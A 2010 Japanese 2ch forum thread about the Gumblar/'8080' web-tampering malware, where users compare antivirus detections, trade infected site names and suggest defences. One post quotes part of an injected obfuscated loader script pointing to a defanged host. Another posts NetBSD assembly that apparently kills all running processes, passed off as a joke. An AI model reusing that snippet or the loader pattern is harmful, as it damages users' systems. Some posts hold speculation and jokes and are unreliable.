今、一番いいセキュリティソフトスレに行こうとしたらAvastがトロイの木馬を発見した 一応未然に防いで削除(移動)出来たようだけど、ほんとに大丈夫なのかな? たった今1日がかりでWindowsのクリーンインストールしたばっかなんだけど
やっぱ2chは怖いね どのスレだったかCファイル破壊コードとか書かれていたし
ふーん
また馬鹿キャラプレイしてるのか
445 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 11:47:30
cファイル破壊コードって何なのさ?
2chスレ内だけで感染できるなら感染してみろや
447 :
440 :2010/01/07(木) 11:53:28
>>446 自分Live2ch使ってるんですが、そのスレ見たらAvastが検出して、その後Avastの履歴見たらLive2chが書かれていました
自分も良く分からないのですが
誤検出ですかね?
どんだけー
検出と感染は違うだろ。 検出に誤検出もなにもない。
2chでJS:Redirector-H [Trj]ならAvastの誤検出
すまん。誤検出はあるな。検出がない。
俺初心者でこのスレ読んで思ったんだけど、2chのスレ見ただけでトロイの木馬って感染するんですか? 今話題のGumblarってのはサイトを見ただけで感染するようですが
誰かここに癌ブラーのソース貼り付けてたよね うつったかも
今日は釣り日和なんか?
2ちゃんに繋ぐFTPアカ持ってる人が踏んで、このページが書き変えられれば感染するんじゃね?
457 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 12:44:51
私は対策ソフトを集めてマルウェアの性能テストなどをしています。 PC雑誌の熟読には自信があります。 私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。 2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar (日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
コピペ乙
経験豊富なあなたがお勧めする Kaspersky Internet Security 2010 これは、買わないといけないね!
AVGは検出してくれないのか?
俺もAVG使ってるんだけど、どうなのか不安なんだよね
/*GNU GPL*/とか 呼びにくい まだ名前ないのか?
JRウイルス
他所は大変だね。 わたしのとこは絶対大丈夫! うぇぇwwwwWw え〜と どれどれ /*GNU GPL*/ ・・・ (°◇°;)
何で新卒採用情報ページばかり? 偶然?
新卒ディレクトリしか入れないFTPアカ持ってるヤツが踏んだんじゃね?
時期的な事情があったりして?
家で更新してんのか
>>447 画像系の直リンにセキュリティソフトが反応しているdけで
専ブラという箱庭世界内ではスレに貼られている有害リンクを直接踏んでWEBブラウザで開かない限りは
120%感染はあり得ません
janeやIE系のlive2chはもちろん、全ての2chブラウザに共通
2chブラウザに脆弱性なしということですか?
いや あったとしても利用されてない
2chのスレを見るだけなら2ch自体が感染しない限りwebブラウザでも同じ 反応するのはコードのコピペ 後は画像サムネイル機能を持った外部ページからの経由ではこれに反応するかもしれないって程度
ここにコード貼り付けた馬鹿がいるから
コード貼りつけたからって馬鹿とかいうなよ リンク貼るヤツより遥かにマシ
比べてどうするんだよw どっちも糞で馬鹿なのには違いない。
不況のあおりですか。 サイバーテロですね。
どっかでVistaは関係ねーとかかかったらPCぶっ壊れてすぐわかるとか言われてたけど 結局どうなのこのGENOだかGumblarだか言うウィルスって
結局誰も何も分かっていない
無償ツールで「Gumblarウイルス」チェックを 〜 セキュアブレインが呼びかけ
セキュアブレインの先端技術研究所の調査によれば、
2009年度第2四半期(2009年7月〜9月)と
第3四半期(2009年10月〜12月)を比較すると、
「Gumblarウイルス」によるWebサイトの改ざん被害の件数は、
約4倍の上昇となっている。
12月に発見された「Gumblarウイルス」によって
改ざんされたWebサイト336件のうち、127件(37.8%)の被害サイトは、
企業のWebサイトとの情報もある。
http://www.rbbtoday.com/news/20100107/64816.html 途中の文を切ってますがかなり増えてるみたいですね。
8080なんて呼んでんのはGENOスレにいるやつだけだろ
Gumblar感染してないか確認する方法は、GENOと同じ?
これって新Gumblar? tp://break24●nl/ </head><script language=javascript><!-- 〜中略〜 POF=unescape(f5DJz);eval(POF)})(/&/g); --></script> <body>
違うと思う
>>484 あんたに聞きたい
なぜ8080と呼称するのをそこまで嫌がるの?
Gumblarと明確に違うものなのだから便宜上8080って呼んでも良いじゃないの
ってかマスコミがGumblarって名で広め過ぎてて各個人ブログもちょっと混乱気味・・・
8080なんて呼んでるやつはごく一部だけって話だろ ポートじゃわかりにくいし勘違いするやつもいるだろうしな
>>484 早く正式名称決めないとヤバイと思うよ、これ。
今回広範囲に被害が広がったのは、GENOと同じ物だと思って対策してなかった人も多いと思う。
対策方法が違うし、とりあえず8080でいいんじゃないの?
gumblar亜種ってことで良いだろ くだらねえことでこだわるなよ
>>490 今のところ発見当初から変わってない特徴が8080ポート指定ってとこなんだから、別に問題ないと思うけど?
どんな勘違いするんだ??
スクリプトなり仕込んでくる実行ファイルは変化してるし、「GNU GPL」は「CODE1」に変化した経歴があるし・・・
>>492 Gumblar直系の亜種としてGumblar.xってのがあるんだよ
そこに8080が食い込んできたからこのスレがGENOスレ発祥で出来たんだけど、マスコミがGumblarで統一しちゃったせいで
あっちのスレにも8080の改竄報告がいったりしてる
ru指定か? ちがったっけ そうならruでもいいな ロシアンガンブラーでいいよ
>>494 だからなんだよ
しつけえな
くだらねえ
>>494 別に亜種は複数合っても良いんだよ
似たような種類だし分かりやすくて良いよ
まあ有名どころのベンダーが適当に付けた名前が定着するだろうけど
テンプレで8080系ってなってるだろ 嫌ならGENOスレでやってくれ
単にテンプレ作ったやつが馬鹿だからだろ 8080なんて普通に使うポート 無知なだけ
8080系ってことはガンブラーの8080系って言いたいんだろ?
呼び名なんて分かれば良いんだよ 世間でガンブラーらなそれで良いだろ 間違いとか言うなよ
>世間でガンブラーらなそれで良いだろ 良くないから感染が広がったんじゃないかと Gumblar8080とかかっこよくね?
分かればGumblarでもGENOでもなんでもいいよ でも今のこのごちゃ混ぜ状態で何が起こってるかって言ったら、8080で感染したのにGumblarってだけでGENOウイルスチェッカーが 未だに使えると思ってる奴が居たり、初代Gumblar(GENOとよく言われた奴)の感染確認方法で確認できると思ってる奴が居たり・・・ どっかベンダーが改めて名前つけてくれたら良いのに・・・ベンダー共通の名前つけよう云々ってどうなったんだ
しかし目的はなんなのかね ウェブ改竄の被害を楽しんでるだけかな
>>504 8080で詐欺紛いもやってるみたいだけどね
>>424 まあコード書き換えれば感染PCをボットネット化するようなこともできるだろうし、金にしようと思えばどうにでもなるな
GumblarもそうだがゾンビPC化すると DOS攻撃やらなにやらでサイバーテロも起こせるだろ? 金になるとしてもかなり危険だと思うがな
この手のウィルスって亜種が作りやすいだろうから、なんか切りがないよな
切りがないけど、アンチウイルスソフトじゃ対応が一歩遅い気がする ブラウザで判定できたらいいのにっておもう
ブラウザで判定する意義が分からん・・・結局ウイルス対策ソフトでやってることと一緒じゃね? そんなことより、使ってるソフトのアップデートを的確にやって既知の脆弱性を埋める&最新のウイルス対策ソフトの常駐の徹底が 一番効果的かと
ブラウザで判定すると早くなるのか? そんなこと無いから同じ
もうJavaScript切っとけ
別にJavaScript自体が悪いって訳じゃないけど、ホワイトリスト形式で使った方が賢明な状況だよね で、この流れでNoScriptの話題に振ると、暴れる粘着が居るという・・・ まあなんだ、IEなら信頼済みサイトゾーンの有効活用、FirefoxならNoScript導入、Operaならサーバーマネージャ使うか No More Scriptsっていうブックマークレット使うか・・・こんな書き方で良い?w
アップデートの徹底がいいのは当然だけど、(ブラウザに定義をカスタマイズできるようにして) jsの内容が難読処理されてたら、実行しないとか、中国ロシアのサイトに飛ばす内容は実行しないとか ウイルスソフトの判定の前にブラウザで判定できたら、2段ガマエになって、よりいいんじゃないかと思っただけ。 ウイルスソフトに任せきりが嫌なんだよ。どこまでちゃんと見てるかわかりづらいから。
ウイルスソフトに任せちゃ駄目だよねw
アドビ製品は強制アップデートでおk
>>513 そんな機能ブラウザに標準搭載したら、正常なサイトまで表示崩れたり、真っ白ってことになりかねんか?
外部の奴がアドオンで作るならまだ現実味があるが、ブラウザベンダー自体が付けるような機能には思えん
そこまで心配なら、真っ新な状態の仮想化環境でブラウジングがお勧め
真っ新なマッシン
>>516 ブラウザベンダーがつけてこそ、そのブラウザの信用やシェアが上がったりしないかな。
まあ現実的ではないと思うけど
>>518 逆に否定意見が結構集まる気がするw
まあ最新バージョンのブラウザはどこもフィッシング対策との名目で何かしらのフィルタリング機能入ってるから、そこに期待するしかないんじゃ
ないかな
と言っても、実際改竄されてるページをブロックできてたり、対応が早いかっていうと・・・
結局は環境を常に最新に、ウイルス対策ソフトも最新に(ただし過信は禁物)ってとこに落ち着く
520 :
名無しさん@お腹いっぱい。 :2010/01/07(木) 23:31:10
ウイルスが先かウイルスソフトが先かという命題と同じ Web改鼠は結果でしかなくて、インターネットの開発者は皆どこかしらの違法結社に属していて ウイルス漬けにされているという現実が露呈した格好だ
なんだか楽天トラベルおかしい?
アメーバがやられた ブログパーツを使ったサイトで改ざんされたらしい 流出事件といいこのサイトはだめぽ
アメバが駄目なんてずっと前から言われてるよ
>523 ノートン先生に怒られた
>>523 Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません
URL:
http://www.zenoah.co.jp/ このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewh
情報:
23:55:06
Kaspersky Internet Security 2010
> Trojan-Downloader.JS.Agent.ewh いつものだね
だから
>>1 ぐらい読めよ・・・・
*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
危険かもしれないってアドレスも含むぞ
お前らよく平気で踏めるな。
だいたい仮想環境で踏んでるんだろ アホもいるだろうけど
自信があるならドンドン踏むことをオススメする、それが漢だ 自己責任だけどね
一応view-source:使ったけどそれでも怒られた オンラインソースチェッカーがなくなったのが辛い
そろそろニュースでも扱われるようになってきたし これを機にネットは怖いという意識が強くなって90年代半ばくらいのネット人口に戻ったりしないものか
しかし.ruばっかだな
別に感染してもたいしたことないしな それほど怖くもないだろ
cnとruを遮断すればかなり安全になるしな
ならないだろうな、無関心な奴は大して気にしなさそうだしニュースで扱われても 一部の人間が騒ぐことになるだけ mixiとかが感染媒体になれば大騒ぎになるだろうけど携帯メインの層は気にもとめないだろう
543 :
541 :2010/01/08(金) 01:22:17
もう一ヶ所/*LGPL*/になっている所をみつけた 新型スクリプトみたいだな 検出できるのはノートンの侵入検知くらいかも avast!にはスクリプトの検体を提出しておこう
>>541 えっ
さっきトロイがどうとかいいながら発狂して何かを遮断したんだが
>>544 標準シールドとWebシールド(高)で使っているんだが
時間差で書き換えられたか?
定義データも手動で更新して100107-0の最新のはず
スクリプトは提出しておいた
貼られた直後に飛び先のチェックでソース見たときは/*GNU GPL*/だったような・・・ まったく確証のない俺の記憶だが、もしかしたら推測通りこの数分・数時間の間に書き換えられたのかも
Amebaのブログパーツ「ノートン警察」閲覧者にトロイの木馬感染のおそれ
http://www.itmedia.co.jp/news/articles/1001/07/news092.html 12月26日午後11時15分、委託先の制作会社が運営管理するブログパーツのサーバが不正アクセスを受け、
プログラムを改ざんされたという。ユーザーからの情報と委託先からの報告で改ざんが発覚。1月6日に
ブログパーツをすべて削除した。
ノートン警察は、シマンテックと共同で昨年9月17日〜12月9日に行った広告キャンペーン。
中川翔子さんの大切なもの「ギザ」をサイバー犯罪グループから守るというストーリー形式で、
ウイルスやトロイの木馬などについても学ぶ内容だったという。
>>523 whois見てそこへ報告すた。
届けばいいけど。。。
>>526 aguseで調べたけど出なかったKasperskyなのに
画像取得日時 2010-01-08 02:53:28
検出されたウイルス(ワーム、スパイウエア)
ウイルス(ワーム、スパイウエア)は検出されませんでした。
551 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 02:59:42
ドクター中松のサイトもやられてる
しかし凄いことになってるな
インターネットからftpでメンテできるwebサイトが多すぎなのが悪いんだろ? うちは、インターネット側からは、VPN経由でしかログインできないようにしてるから、 HP制作会社にはVPNクライアントいれてもらってる 仮にFTPアカウントが漏れてもVPNの認証を突破しない限り書き換え不可
557 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 03:34:32
今まで/*GNU GPL*/だったサイトも/*LGPL*/に変わったりするのかな? Webシールドに頼って定義ファイルが手薄だったavastには不吉な予感
RequestPolicyでブロックしたがthelaceweb●ruだな。
>>523 スクリプト以外は今までと同じっぽいから
スクリプトだけで対応してたアンチウイルスは以外は大丈夫みたいだね
>>541 ,543
漏れも別の感染のサイトで「/*GNU GPL*/ 」が「/*LGPL*/」に変わったのを確認したお。。。
他もそーなるんだろか…
ドクター中松のサイトが/*LGPL*/になった・・・
しかも呼び込み先変えてるっぽい…
yahooやらgooやらがやられない事を祈るだけだな・・・
>>562 もともと/*LGPL*/じゃなかったの?
俺は初めに見た時から/*LGPL*/だったよ?
カスペは全く反応しなかったよ
新種なの?
>>566 >>551-553 自分も確認したけどね
メモに控えてある感染サイトも時間ごとに/*LGPL*/に置き換わってる
あきらかに新型スクリプトだな
確認してないがウイルス本体も新型かもな
検出逃れのために数時間の間に書き換えが行われているってこと?
春先のGENO騒動(同人祭り)に比べてスレ伸びが鈍いのが気になる…大手企業も続々やられてるというのに。 adobe系更新でokだからか? 一般ユーザには実害が無いからか? 春先はちょうど時期的に豚インフルと重なって盛り上がっただけなのか? この手の騒動に飽きたのか?
それじゃソフト入れて対策コピペの奴全部実行して対処しても意味ねーじゃん('A`)
>>573 > 同人祭り
学習したんじゃないかな。。。
>>574 頻繁に更新があるウイルスもあったのでにゃー
>>573 GENOは起動不可だったり動作が重たかったりで気がつかれる失敗作だから
今回はちゃんと動くバージョンに進化したた言うべきなのか、いやな進化だ
ちょっと重いとかネットワークハブのランプが常にチカチカとか普通の人は気がつかないから怖い
>>576 にゃるほど。
初期のものはそーだったのか。
>>573 ・2ちゃんねるの規制・スレ分割・8080とGumblarと区別できなくて情報が錯綜・感染したか実感がない
などなど考えられることは多数。ってかスレの勢いが盛り上がりの指標とは限らない
正直、感染しましたってだけのレスだけで加速してるのならこれぐらいの勢いで、有用な情報のみ書き込まれる方が良い
>>574 発覚してない脆弱性を使ったゼロデイが使われない限り、今までの対策で問題なし
>>576 Gumblarとはまた別物なんだから進化したって訳じゃないだろ。今までのものより厄介な新種が出てきたって言った方が正しくね?
ちなみに初代Gumblarも復活の兆しありとか
>>573 前回時にAdobe系のアンスコやアップデートやAcrobat JS切る等の対策は周知されてたわけだから
今回騒いでるのって前回対策取らなかった人達だけだからじゃね
>>579 そうだな、8080系と言っておかないと混同してしまうな
ウイルス製作者同士のプライド合戦とか勘弁してほしいよ
>>578 水面下で拡大して後々めんどくさい事になるのが怖いんだが…。
結局、8080系に引っかかった奴らって
>>580 が答えなの?
あんだけ騒がれてたのにアップデートもしてなかったの?
同人系でも古参が多かったり旬で活発なジャンルは今でもGENOの注意書き残してるとこ多いからなぁ 若い子が多いジャンルや活動が活発じゃないジャンルは放置しっ放しだが
コメント行が書き換えられただけで検出できないって・・ どこのセキュソフトも本格的な対策は取ってないってこと?
>>581 まあGumblarと8080系の作った作者orグループが同一人物orグループでないとも言い切れないんじゃないのかな?w
そこら辺どうなってんのかはよく知らんけど、感染経路は似ていても別物であることは確か
>>585 何を以て本格的な対策と言うのか?そりゃスクリプトの時点で検知できなくても、その先で検知する場合もあるだろうし、しないかもしれない
ユーザーができる本格的な対策と言えば、脆弱性のあるソフトのアップデートとReaderのjs切るってこと
そしてウイルス対策ソフトで検知できるから安心だ!とか絶対に思わないこと
>>585 いや、Gumblar.xの時はもっとひどくて取得ごとにスクリプトが違ってたから
誤検出を考えると対応が難しいんだと思う
ほぼ確実な検出ができたのはカスペくらいだったはず
今のところついてってるのはNOD32だけだね ユーザーの対策が出来ていても、htmlに埋め込まれたドロッパーは取り込んでしまうからね。 それに、この調子だとユーザー側の対策なんて、気休め程度になってしまうかもしれない。 JAVAもフラッシュも使えないネットなんて 経済的損失が計り知れなくなるだろう。
業者起きたのか。釣り針でけえな
NOD32(笑)
JAVAとJAVAScriptの区別は必要だな
>>593 それ書いたのは僕なんですがAvast!信者です。
さて、変わったのはコメント行だけかな? どうやって指令してるのかな?
犬HKラジオでもトップニュース扱いだな。
受付のスクリプトに反応するかしないかの問題であって、他のベンダーが絶対検知できないって訳じゃないでしょ 要はどの段階で検知するかの問題 後virustotalでの結果と実製品で違いでる場合がある。ヒューリスティックの違いなのか、HIPSとかとの兼ね合いなのか詳しい事は俺は知らん でも1つだけ言えることは、このスレはどこのベンダーが良い・悪いとか議論するとこじゃないと思うけど? 製品比較やりたいなら、適当な別スレでどうぞ
598 :
592 :2010/01/08(金) 06:12:34
自分はあくまで検証目的で貼っただけなんだが・・・ 気を悪くしたなら少し控えるか 定義データに左右されないらしいノートンの侵入検知の例もあるしな
>>598 いやいや、検証目的としてはぜんぜんおkだし
>>592 のレス内容を叩いてる訳じゃない。これからもどうぞ続けて下さいw
俺が言いたかったのはただ単に特定のベンダーが良い・悪いとかここですんなよってだけです
紛らわしいタイミングになってサーセン
>>599 おk
ではこれからも節度を持った上で貼らせてもらおう
なんだかすげえ馬鹿スレになってきたな
602 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 07:43:56
>>522 ノートンは確信犯だってば
芸能アバターのせい
良い悪いすんなっても気になるのが人情だろ。 人間見ないでルールだけ見る奴って何なの?
avast以外大丈夫だよ
そもそも、インターネットからFTPで更新できるってのがもういまの時代はダメダメだろ 特定のIPアドレスに制限するとか、VPN必須にするとかしないと
>>604 なにが?avast!以外大丈夫なのかな?
これ明らかに世界中のインターネット絶滅推進派が仕組んだテロだろ
こういうネズミ算式に増えていく無差別で大規模な改竄は今まで何度かあったけど、 今回はAdobeが脆弱性を12日(日本時間13日)まで放置してるのが痛すぎる。
>>609 年末年始休暇を狙った組織的犯行の模様
サイト運営者もアップデート担当の開発者も休みだろうしな
611 :
sage ◆sage/xLnlI :2010/01/08(金) 10:28:46
結局どうすりゃいいのよ、誰もわかんないのかよ
lanケーブルをハサミでチョキンとやれば確実に防げるぞ
FTPの情報どうやって抜いてんの? FFFTPのレジストリに生で記録されてんのか? iniに出力するようにしてるんだが、どうだろうか
会社で借りてるサーバにうちの馬鹿が感染させたんだが、 上に言っても、パスワードは変えられないの一点張り、脳みそがイカれてる 書き換えられるたびにコード削除していくの疲れたよ
FTP通信したときのパケットそのものを見てると思う FTPソフト側での回避は無理
>>615 乙
感染したのは8080?
書き換えられる頻度はどのくらい?
>>615 なんで変えられないんだろう?
感染をもみ消したいのかな?
更に大きな感染呼び込んで信用失うだけだと思うが。
621 :
sage ◆sage/xLnlI :2010/01/08(金) 12:09:16
>>617 まだ3回くらいだけどね
IDパスばれてるんだから今後もやられるとしたらキツいんだ
今は/*LGPL*/から始まって8!@0@^8)@0?/とか書いてあるから8080だろう
前は/*GNU GPL*/だったな
一部/*GNU GPL*/〜のまま放っておいたものが/*LGPL*/〜に置き換わってた
追記じゃないみたいだね
>>620 全ファイル消去されたら考えも変わるかもね
俺は元データ持ってないから落してエディタで書き換えて再アップ
スクリプト書いて消そうかと思ったけどミスって全消去したら・・・怖いな
他人の不幸で飯が旨い
どうせ感染したというアナウンスもしてないんだろ てういか今後も感染するから出せないかw
>>623 実際、原始時代みたいな会社だよ
いくら言っても「スキャンしとけよ、ファイル書き換えておけ」と言われるだけ
セキュリティに何の関心もない様子
去年のGENOもしっかり掛かってたしな、そのときもパス変えてくれって言ったけど今に至る
>>626 そういうバカ会社は一回痛い目を見ないと変わらないから
全消去になったほうがいいかもね。
いくら言っても聞かなかったくせに、いざその事態になると泣きつくんだよな。
ほんと氏ねよと思うわw
629 :
sage ◆sage/xLnlI :2010/01/08(金) 12:28:39
誰か検体上げてくれ
631 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 12:33:58
なんでサーバーの管理者がWindowsなんか使ってるんだ? 普通は違うOSを使うと思うんだけどな
ずっと鯖OSさわってるのは鯖屋であって 鯖管とは違くないか Telnetあるし
634 :
sage ◆sage/xLnlI :2010/01/08(金) 12:41:51
ソースチェッカーオンラインみたいなサイトないの? 怖くて未知のURLは踏めん・・・
Telnetってww いつの時代だよwww
637 :
sage ◆sage/xLnlI :2010/01/08(金) 12:43:45
仮想でAVAST止めて行ったら仮想じゃない方攻撃されてノートン先生に止められたwwwwwww
顧客情報にアクセスできるショッピングサイトの管理者はすぐに対応しろ
639 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 12:45:22
>>637 そのゲストOS・・・プロダクトキー入れてる?
盗まれるぞ・・・
>>281 それってなんでWindows標準FWだと防げないの
既知のアプリの未知のポートだと無理だけど
未知のアプリが通信しようとすればポップアップがあるのは変わらないはずだけど
>>641 WindowsファイアウォールAPIってのがあってだな・・・
例外追加等々
644 :
sage ◆sage/xLnlI :2010/01/08(金) 13:31:12
>>640 このゲストOS・・・プロダクトキー入れてる
盗まアッれるの・・・
そもそも、Windowsを管理者権限で常に使用してるようなやつが Firewallとかセキュリティーとかの各種設定をトロイに変更されたりするんだろ 通常使用は一般ユーザーで使用すればいいのに 7/Vistaなら、ログインしなおさなくても管理者権限が必要なときは管理者パスワードのダイヤログボックスが開いて すぐ管理者作業できるから、常に一般ユーザーでログイン知れればいい
>>644 マイクロソフトで使用期限3ヶ月くらいの体験版の仮想マシンVPC配ってるから、
その仮想マシン使えばいい
一般ユーザーですら管理者権限 流石Microsoft
649 :
sage ◆sage/xLnlI :2010/01/08(金) 13:37:32
>>647 大丈夫がと思うよ
なにかあったときにはAVASTとノートン先生が守ってくれるからb
650 :
sage ◆sage/xLnlI :2010/01/08(金) 13:38:12
>>648 なアッー!っなアッー!んだアッー!ってええええええええええええええええええええええええええええええええええええええええ
651 :
sage ◆sage/xLnlI :2010/01/08(金) 13:40:03
>>647 アッー!と、一回M$のXPModeで、ひどい目にアッー!っアッー!から使いたくない
◆sage/xLnlI、アウト〜
>>646 明示的に表示されてないとfirewallスルーできないよね
できないといって><
654 :
sage ◆sage/xLnlI :2010/01/08(金) 13:42:12
結論「ユーザーの意識改革が必要」
少々知識が足りなかったようだな
657 :
sage ◆sage/xLnlI :2010/01/08(金) 13:44:29
Firefoxがクラッシュしまアッー!した
NGNameに追加 sage </b>◆sage/xLnlI <b>
話は全部聞かせて貰ったぞ!(ガラッ sage ◆sage/xLnlIのプロダクトキーは既に流出している
660 :
sage ◆sage/xLnlI :2010/01/08(金) 13:46:35
既に感染しているかどうかを調べる方法がないことだけは分かった
662 :
sage ◆sage/xLnlI :2010/01/08(金) 14:00:29
>>661 うn
windows7の感染確認方法知ってす人いないよね?・?
>>646 そもそもXPの時点では、まともにユーザーモードで動かないソフトが多すぎて...
ずっとこんなイタチゴッコ続けるのかよ。 感染したらUbuntuにする。少なくとも嫁のPCは。
もそもそ
むしろ感染してしまえば楽になるような気がする 俺は遠慮するけど
とりあえず現状、普通のクライアントPCが感染してるかどうかの判断ってどうやってんの? 春のGENO祭りの時にはレジストリ内におかしなファイルが有るか無いかで判断してたが
ウイルスの検体マダー!?
>>663 自分もそれが困る
たいしたソフトじゃないのになんで管理者権限じゃなきゃいけないんだろう
671 :
sage ◆sage/xLnlI :2010/01/08(金) 14:12:54
プロダクトキーを入力せずにインスコ→被害者向けの特価で正規のプロダクトキー購入→ウマー これがMicrosoftクオリティーなのか・・・
>>668 ウソの情報が飛び交ってるだけで、アンチウイルスソフト作ってる会社でも分からない
>>673 嘘の情報ってww
検体があればリバースエンジニアリングで動作くらい分かるだろJK
675 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 14:32:49
>>663 つ 別のユーザとして実行
これで動かないソフトのほとんどは動く。
あっちこっちで呼び方が違うからもう何がなんだか分からない
>>664 誰も使ってないようなOSにすればウイルスのターゲットにならないから、
できるだけマイナーなのにしとけ
NetBSDとかOpenBSDとか
普通のクライアントPCは感染してるかどうか確認する方法ないの? マジで? 全台クリーンインストールしろと言うのか
>>678 新種のマルウェアに強いウイスルソフト使ってスキャンすればいいだろ
100%ではないが、だいたい確認できる
section .note.netbsd.ident dd 0x07,0x04,0x01 db "NetBSD",0x00,0x00 dd 200000000 section .data section .text global _start _start: xor eax, eax push 0x09 mov eax, -1 push eax xor eax,eax mov al, 37 push eax int 0x80
>>648 マニュアル読め。
スタートアップガイドで普段は制限ユーザで使うようにと書いてあるわ。
AdobeReaderもFlashPlayerもJREも、 常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。 つまり、アップデートに気を使ってた場合でも、 最新版になる前にたまたま感染サイト踏んでたらアウトだよな。
>>681 誰でも簡単に権限昇格できるWindowsなんて(ry
>>675 大量にあったら、そんなめんどーなことは誰もやってくれないつぅこと
各アプリケーションもほとんどまともに対応してくれなかったしねぇ〜
Vistaが出てやっと対応したところのが多いじゃん
【ネット】洋菓子「モロゾフ」のサイト、何者かが改ざん 閲覧すると新型ウイルス「ガンブラー」に感染する恐れがあったが、被害報告なし 1 :おっおにぎりがほしいんだなφ ★:2010/01/06(水) 07:20:34 ID:???0 洋菓子メーカー「モロゾフ」(本社・神戸市)のインターネットサイトが 何者かに改ざんされる被害に遭っていたことが5日、わかった。 同社によるとサイトを閲覧したパソコンが新型コンピューターウイルス 「ガンブラー」に感染する恐れがあったが、被害の報告はなく、 サイトは改善済みという。 同社の説明では、改ざんされたのは4日午後7時半〜5日正午で、 感染や情報漏えいなどの連絡はない、としている。 ↑ こういう「被害の報告は無く」ってのが一番怖いと思うんだが… 閲覧ユーザは感染に気づかず、ボット化してる可能性もあるって事だろ?
>>682 だからそのときのために、わざわざMSがIEに保護モードつけたりしてくれてるんだろ
ちゃんと保護モードに対応したIEプラグイン類なら、プラグインに脆弱性があってマルウェアにやられても、
やられる範囲を制限できる
保護モードなんてバイパス出来るだろww
>>686 IEの保護モード機能ってサイト閲覧時のファイル保存先を限定してるだけじゃないの?
Adobeの脆弱性を突いた攻撃と何の関係があるの?
感染しているかどうかを調べる 今一番有力な方法を教えてくださひ。
webサイト作ったらわかるんじゃね? 改ざんされたら感染してる
VPCでモロゾフを踏んでみた。 processmoniterでその時の挙動を調べてみたが、何も起こらない・・・
保護モードって、IEのプロセスを通常よりさらに限定された権限で
動作させることに一番の意味があるんだよ
保護モード非対応のプラグイン類を動作させるときはデフォルトで警告が出るし、
警告がでない保護モード対応プラグインなら、脆弱性でやられてもまず影響が出ない
保護モード下で動いてるIEやプラグインに脆弱性があってやられても、
システムのほとんどの場所に書き込めない
このあたり呼んでみれば?
http://msdn.microsoft.com/ja-jp/library/bb250462 (VS.85).aspx
>>692 適当なHTML作って、FTPでどこか上げたときに
書き換わってるかをチェックする感じでしょうか?
社員のPCをチェックしたいんですがなにかいい
方法はないかなァと思いまして。。。
>>693 そりゃあ、今踏んだって何も起こらなくて当然。
>>694 を素直に読むと、IEの保護モード有効下だとAdobe脆弱性回避できるように思えるけど実際は違うよな?
他サイトに飛ぶときに警告を出せば済む話だろう 2ちゃんを見習え
>>694 >>99 99 :名無しさん@お腹いっぱい。:2009/12/28(月) 08:37:05
何か役に立つかもしれないので報告
fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆)
/*GNU GPL*/〜というコードが埋め込まれてたっぽい
↓
サイトを開くと
このファイルの実行を許可しますか?というウインドウが出てきて(VISTA)
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる
↓
(以下略)
これってつまり、IE保護モードで今回のリスクは回避されないんじゃね?
保護モードは一部回避可能だけど、 Flashの脆弱性を狙うコードが保護モード回避したとかの話は聞いたこと無い テストコードは出ても、実際にそれを使ったマルウェア等は出てない
感染実験したいからURLくれ
>>696 そこ見ても、保護モードのシステムの管理下で動作するだけで、
勝手にシステムとかに書き込めるわけじゃないじゃん
>>694 >Adobe Readerの脆弱性攻撃は、「ChangeLog.pdf」というPDFファイルの中に
>複数の攻撃コードが組み込まれており、パソコンにAdobe Readerがインストールされている場合には、
>この細工されたPDFファイルを自動的に開いて攻撃を行う。
↑保護モードでは通過してしまうプロセスを悪用してるんじゃないのかと
>>脆弱性でやられてもまず影響が出ない そういえばJavaがウイルスのローダーとして悪用されていた件 脆弱性以前の問題だよね・・・
もうどんな防御しようと無意味なんじゃないかって思えてきた
OSなりブラウザを仮想化すれば良いではないか
そういう手段しか思いつかないレベルってことですね
>>706-708 NO
Adobeがちゃんと脆弱性塞いでれば良いだけの話
もっと言えばMSが情報公開して協力してれば良いだけの話
攻撃自体は単純
警視庁も動きだしたそうじゃないか どこまでできるのかわからんけど
711 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 16:37:16
713 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 16:46:25
JavaもReaderもアンインストール WindowsとFlashは最新 ばっちこいや
>>713 最終ステップ:Windowsもアンインストール
WIN7は感染しないんですか?
ゲームやケータイのブラウザが最強だな 感染する場所がありゃしないぜ!
もうみんなでマカーになろうよ
つlinux
凄い初心者な質問で申し訳ないけど 普段から使ってるもの一通り最新版にしておけばGumblarに限らず 大体のウイルスにかからないもんなの?
さきほどGENOウィルスが仕込まれてる可能性の高いURLを踏んでしまいました。
慌てて途中でブラウザを閉じたのですが感染してるか心配です。
こちらの(
http://www29.atwiki.jp/geno/ )GENOウイルスまとめサイトに書かれていた方法を確認し
感染の可能性は低いと判断しましたが、このサイトの情報は古いと書いてあったので
本当に無事なのかちょっと心配です。
上記サイトに書かれている方法以外に感染を判断する方法はありますか?
>>720 古いバージョンの脆弱性を狙うタイプのウイルスは防げるかと思われ
それ以外にも例えばAdobeReaderのjsOFFみたいな機能設定に関する脆弱性とか、
そもそも実行型ファイルを開いて感染する場合もあると思うけども
>>720 一通り最新版にして適切な設定にしていれば助かる可能性は高くなる
なんでもかんでも自動実行されるPCだとGumblarに限らず危険って事
>>709 Adobeの対応悪すぎだよな。
過去のMicrosoftと同じ過ちを繰り返してる。
みんな歴史に学べないねぇ。
>>720 新型はふせげねー、新型にあたったらクリーンインストールするしかない
来週の話でしょ。 対応遅すぎ。
なんでそんな悠長に構えてんだろうなアドビ 自分とこの製品が犯罪に利用されてるってのに
